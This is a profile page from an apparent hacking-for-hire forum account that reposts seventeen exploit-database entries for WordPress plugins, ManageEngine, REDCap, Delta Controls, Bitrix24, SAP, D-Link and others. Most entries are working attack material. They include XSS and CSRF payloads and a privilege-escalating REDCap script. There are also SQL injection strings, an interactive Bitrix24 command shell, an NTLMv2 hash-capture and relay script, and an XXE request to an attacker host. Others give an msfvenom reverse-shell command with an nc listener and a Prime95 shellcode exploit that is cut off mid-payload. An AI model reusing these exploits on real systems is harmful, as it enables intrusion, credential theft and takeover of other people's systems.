Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/ # Date: 2022-04-13 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: http://www.a-j-evolution.com/ # Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip # Category: Web Application # Version: 1.7.4 # Tested on: CentOS / WordPress 5.9.3 # CVE : N/A # 1. Technical Description: The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing potentially dangerous characters to be inserted. This includes the reported payload, which triggers a persistent Cross-Site Scripting (XSS). # 2. Proof of Concept (PoC): a. Install and activate version 1.7.4 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos). c. Open the "Video example" or create a new one (whichever you prefer). d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video) the following payload: " autofocus onfocus=alert(/XSS/)>. e. Save the changes. "Edit" button. f. JavaScript will be executed and a popup with the text "XSS" will be displayed. Note: This change will be permanent until you modify the edited field.
  2. HireHackking

    ManageEngine ADSelfService Plus 6.1 - User Enumeration

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Version: ADSelfService 6.1 Build 6121 # Tested Against: Build 6118 - 6121 # Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md # !/usr/bin/python3 import requests import sys import time import urllib3 from urllib3.exceptions import InsecureRequestWarning """ The domain users can be enumerated like userenum module of the kerbrute tool using this exploit. If you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive. """ def request(target, user): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) url = target + 'ServletAPI/accounts/login' data = {"loginName": user} headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} req = requests.post(url, data=data, headers=headers, verify=False) # For debugging # print("[*] Response for " + user + ": " + req.text.strip()) if 'PASSWORD' in req.text: print("[+] " + user + " is VALID!") elif 'Your account has been disabled' in req.text: print("[+] " + user + " account has been DISABLED.") elif 'Your account has expired' in req.text: print("[+] " + user + " account has EXPIRED.") elif 'Enter the text as shown in the image.' in req.text: print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ") elif 'Permission Denied.' in req.text: print("[-] " + user + " is not found.") def get_users(target, file): try: file = open(file, "r") for line in file: line = line.strip() time.sleep(0.5) request(target, user=line) except FileNotFoundError: print("[-] File not found!") sys.exit(1) def main(args): if len(args) != 3: print("[*] Usage: %s url usernames_file" % (args[0])) print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0])) sys.exit(1) get_users(target=args[1], file=args[2]) if __name__ == "__main__": main(args=sys.argv)
  3. HireHackking

    REDCap 11.3.9 - Stored Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting # Date: 2021-10-11 # Exploit Author: Kendrick Lam # References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js # Vendor Homepage: https://projectredcap.org # Software Link: https://projectredcap.org # Version: Redcap before 11.4.0 # Tested on: 11.2.5 # CVE: CVE-2021-42136 # Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf ### Stored XSS – Missing Data Code Value (found by Kendrick Lam) It was possible to store JavaScript as values for Missing Data Codes. - Where: Missing Data Code. - Payload: <script> var target = document.location.host; var csrf_token = csrf_token; var userId = '<userId>'; // Replace with your user ID. function privesc() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.setRequestHeader("Sec-Fetch-Dest", "empty"); xhr.withCredentials = "true"; var body = ""; body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token; xhr.send(body); return true; } privesc(); </script> - Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator). - Privileges: Low privileged / regular user - Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX - Privileges: + Store: Low privileged user is able to store Missing Data Code values. + Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
  4. HireHackking

    WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated) # Date: 2022-03-03 # Exploit Author: Roel van Beurden # Vendor Homepage: https://wppopupmaker.com # Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip # Version: <1.16.5 # Tested on: WordPress 5.9 on Ubuntu 20.04 1. Description: ---------------------- WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. 2. Proof of Concept: ---------------------- Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time (overwrite the default '1 month' with XSS payload) Click 'Add' what triggers the XSS payload Payload examples: <script>alert('XSS');</script> <img src=x onerror=alert('XSS')>
  5. HireHackking

    Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) # Exploit Author: LiquidWorm <!DOCTYPE html> <html> <head><title>enteliTouch XSS</title></head> <body> <!-- Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS) Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: Input passed to the POST parameter 'Username' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML code in a user's browser session in context of an affected site. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5703 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php 06.04.2022 --> <form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST"> <input type="hidden" name="userInfo" value="" /> <input type="hidden" name="UL&#95;SelectedOptionId" value="" /> <input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" /> <input type="hidden" name="formAction" value="Delete" /> <input type="submit" value="CSRF XSS Alert!" /> </form> </body> </html>
  6. HireHackking

    Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) # Exploit Author: LiquidWorm <!DOCTYPE html> <html> <head><title>enteliTouch CSRF</title></head> <body> <!-- Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF) Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5702 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php 06.04.2022 --> CSRF Add User: <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST"> <input type="hidden" name="actionName" value="" /> <input type="hidden" name="Username" value="zsl" /> <input type="hidden" name="Password" value="123t00t" /> <input type="hidden" name="AutoLogout" value="17" /> <input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" /> <input type="hidden" name="ObjRef" value="" /> <input type="hidden" name="Apply" value="true" /> <input type="hidden" name="formAction" value="Add" /> <input type="submit" value="Go for UserAdd" /> </form> <br /> CSRF Change Admin Password (default: delta:login): <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST"> <input type="hidden" name="actionName" value="" /> <input type="hidden" name="Username" value="DELTA" /> <input type="hidden" name="Password" value="123456" /> <input type="hidden" name="AutoLogout" value="30" /> <input type="hidden" name="SS&#95;SelectedOptionId" value="" /> <input type="hidden" name="ObjRef" value="ZSL-251" /> <input type="hidden" name="Apply" value="true" /> <input type="hidden" name="formAction" value="Edit" /> <input type="submit" value="Go for UserEdit" /> </form> </body> </html>
  7. HireHackking

    Bitrix24 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated) # Date: 4/22/2022 # Exploit Author: picaro_o # Vendor Homepage: https://www.bitrix24.com/apps/desktop.php # Tested on: Linux os #/usr/bin/env python #Created by heinjame import requests import re from bs4 import BeautifulSoup import argparse,sys user_agent = {'User-agent': 'HeinJame'} parser = argparse.ArgumentParser() parser.add_argument("host", help="Betrix URL") parser.add_argument("uname", help="Bitrix Username") parser.add_argument("pass", help="Bitrix Password") pargs = parser.parse_args() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] inputcmd = input(">>") s = requests.Session() def login(): postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password} r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata) def getsessionid(): sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en", headers = user_agent) session = re.search(r"'bitrix_sessid':.*", sessionid.text) extract = session.group(0).split(":") realdata = extract[1].strip(" ") realdata = realdata.replace("'","") realdata = realdata.replace(",","") return realdata # print(r.text) def cmdline(cmd,sessionid): cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'} usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers = user_agent, data = cmdline) soup = BeautifulSoup(usercmd.content,'html.parser') cmd = soup.find('p').getText() print(cmd.rstrip()) login() sessionid = getsessionid() while inputcmd != "exit": cmdline(inputcmd,sessionid) inputcmd = input(">>")
  8. HireHackking

    Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure Exploit Author: LiquidWorm Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: The application suffers from a cleartext transmission/storage of sensitive information in a Cookie. This allows a remote attacker to intercept the HTTP Cookie authentication credentials through a man-in-the-middle attack. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5704 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php 06.04.2022 -- GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1 Host: 192.168.0.210 Cache-Control: max-age=0 User-Agent: Toucher/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG Connection: close
  9. HireHackking

    CSZ CMS 1.3.0 - 'Multiple' Blind SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi # Date: 2021-04-22 # Exploit Author: Dogukan Dincer # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download # Version: 1.3.0 # Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4 # Discovery of Vulnerability - First go to CSZ CMS web page - then go to http://yourhost/plugin/article directory on CMS. - To see the error-based SQLi vulnerability, the ' character is entered in the search section. - It is determined that the "p" parameter creates the vulnerability. - Databases can be accessed with manual or automated tools. # Proof of Concept http://127.0.0.1/csz-cms/plugin/article/search?p=3D1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - # Sqlmap output: Parameter: p (GET) Type: error-based Title: MySQL >=3D 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: p=3D1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=3D8555,1))),0x716a717a71))-- OUUO Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: p=3D1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS
  10. HireHackking

    SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) # Google Dork: N/A # Date: 4/21/2022 # Exploit Author: West Shepherd # Vendor Homepage: https://www.sap.com/ # Software Link: https://www.sap.com/ # Version: 4.2 and 4.3 # Tested on: Windows Server 2019 x64 # CVE : CVE-2022-28213 # References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \ --data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \ https://example.com/biprws/logon/long
  11. HireHackking

    Wondershare Dr.Fone 11.4.10 - Insecure File Permissions

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions # Date: 04/25/2022 # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) # Vendor Homepage: https://drfone.wondershare.com/ # Software Link: https://download.wondershare.com/drfone_full3360.exe # Version: 11.4.10 # Tested on: Windows 10 64-bit # Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website) # Description: The application "Wondershare Dr. Fone" comes with 3 services: 1. DFWSIDService 2. ElevationService 3. Wondershare InstallAssist All the folders that contain the binaries for the services have weak permissions. These weak permissions allow any authenticated user to get SYSTEM privileges. First, we need to check if services are running using the following command: wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto LocalSystem Running Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe Auto LocalSystem Running Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto LocalSystem Running Now we need to check if we have enough privileges to replace the binaries: icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone" Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit) ... icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps" Everyone:(I)(OI)(CI)(F) <= same here ... icacls "C:\ProgramData\Wondershare\Service" Everyone:(I)(OI)(CI)(F) <= and here ... # Proof of Concept: 1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help") 2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\) 3. After replacing the binary, wait the next reboot (unless the service can be restarted manually) As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener: simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe listener: nc -nlvp <YOUR_PORT>
  12. HireHackking

    TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path # Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg # Discovery Date: 2022-04-25 # Vendor Homepage: https://itec.es/programas/ # Vulnerability Type: Unquoted Service Path Privilege Escalation # Tested on OS: Microsoft Windows 11 Home To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. C:\Users\edgar>sc qc "ITeCProteccioAppServer" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ITeCProteccioAppServer TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : ITeCProteccioAppServer DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\edgar>systeminfo Nombre de host: DESKTOP-0DL5SID Nombre del sistema operativo: Microsoft Windows 11 Home Versión del sistema operativo: 10.0.22000 N/D Compilación 22000
  13. HireHackking

    UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path # Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg # Discovery Date: 2022-04-24 # Vendor Homepage: https://www.zte.com.cn/global/ # Tested Version: 2.0.3.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ UDisk Monitor Z5 Phone UDisk Monitor Z5 Phone C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe Auto C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: UDisk Monitor Z5 Phone TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : UDisk Monitor Z5 Phone DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\edgar>systeminfo Nombre de host: DESKTOP-810865D Nombre del sistema operativo: Microsoft Windows 10 Pro Versión del sistema operativo: 10.0.19044 N/D Compilación 19044
  14. HireHackking

    ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability # Version: ADSelfService Plus Build < 6121 # Tested against: Build 6118 # CVE: CVE-2022-29457 # !/usr/bin/python3 import argparse import requests import urllib3 import random import sys """ 1- a)Set up SMB server to capture NTMLv2 hash. python3 smbserver.py share . -smb2support b)For relaying to SMB: python3 ntlmrelayx.py -smb2support -t smb://TARGET c)For relaying to LDAP: python3 ntlmrelayx.py -t ldaps://TARGET 2- Fire up the exploit. You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes. """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def get_args(): parser = argparse.ArgumentParser( epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1") parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ') parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain') parser.add_argument('-u', '--user', required=True, action='store') parser.add_argument('-p', '--password', required=True, action='store') parser.add_argument('-t', '--target', required=True, action='store', help='Target url') parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash') args = parser.parse_args() return args def scheduler(domain, auth, target, listener, user, password): try: with requests.Session() as s: gUrl = target getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False) csrf = getCsrf.cookies['_zcsr_tmp'] print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp']) if auth.lower() == 'adselfservice': auth = "ADSelfService Plus Authentication" data = { "loginName": user, "domainName": auth, "j_username": user, "j_password": password, "AUTHRULE_NAME": "ADAuthenticator", "adscsrf": [csrf, csrf] } #Login url = target + "j_security_check" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False) #Auth Check url2 = target + "webclient/index.html" req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False) if req2.status_code == 200: print("[+] Authentication is successful.") elif req2.status_code == 302: print("[-] Login failed.") sys.exit(1) else: print("[-] Something went wrong") sys.exit(1) dn = domain.split(".") r1 = random.randint(1, 1000) surl = target + 'ServletAPI/Reports/saveReportScheduler' data = { 'SCHEDULE_ID':'0', 'ADMIN_STATUS':'3', 'SCHEDULE_NAME': 'enrollment' + str(r1), 'DOMAINS': '["'+ domain +'"]', 'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","NAME":"'+ domain +'"}]}}}', 'SELECTED_REPORTS': '104,105', 'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]', 'SCHEDULE_TYPE': 'hourly', 'TIME_OF_DAY': '0', 'MINS_OF_HOUR': '5', 'EMAIL_ID': user +'@'+ domain, 'NOTIFY_ADMIN': 'true', 'NOTIFY_MANAGER': 'false', 'STORAGE_PATH': '\\\\' + listener + '\\share', 'FILE_FORMAT': 'HTML', 'ATTACHMENT_TYPE': 'FILE', 'ADMIN_MAIL_PRIORITY': 'Medium', 'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub', 'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html', 'MANAGER_FILE_FORMAT': 'HTML', 'MANAGER_ATTACHMENT_TYPE': 'FILE', 'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub', 'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html', 'adscsrf': csrf } sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False) if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text: print('[-] The target is patched!') sys.exit(1) if sch.status_code == 200: print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!") else: print("[-] Something went wrong. Please, try it manually!") sys.exit(1) except: print('[-] Connection error!') def main(): arg = get_args() domain = arg.domain auth = arg.auth user = arg.user password = arg.password target = arg.target listener = arg.listener scheduler(domain, auth, target, listener, user, password) if __name__ == "__main__": main()
  15. HireHackking

    DLINK DIR850 - Open Redirect

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DLINK DIR850 - Open Redirect # Product: Dlink # Model: DIR850 # Date: 14/1/2022 # CVE: CVE-2021-46379 # Exploit Author: AhmedAlroky # Hardware version: b1 # Firmware version: ET850-1.08TRb03 # Vendor home page: https://www.dlink.com/ #Exploit : Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1
  16. HireHackking

    DLINK DIR850 - Insecure Access Control

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DLINK DIR850 - Insecure Access Control # Product: Dlink # Model: DIR850 # Date: 14/1/2022 # CVE : CVE-2021-46378 # Exploit Author: Ahmed Alroky # Hardware version: b1 # Firmware version: ET850-1.08TRb03 # Vendor home page: https://www.dlink.com/ # Exploit : Visit http://<IP Address>/config.dat
  17. HireHackking

    Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) # Discovered by: Yehia Elghaly # Discovered Date: 2022-04-25 # Vendor Homepage: https://www.mersenne.org/ # Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip # Tested Version: 30.7 build 9 # Vulnerability Type: Buffer Overflow (RCE) Local # Tested on OS: Windows 7 Professional x86 # Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE # 1- How to use: open the program go to test-PrimeNet-check the square-Connections # 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open buffer = "A" * 144 jum = "\xd8\x29\xe7\x6e" #push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll) nop = "\x90" * 20 #Nob hot = "C" * 100 #sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload payload = b"" payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d" payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d" payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6" payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2" payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a" payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff" payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f" payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca" payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d" payload += 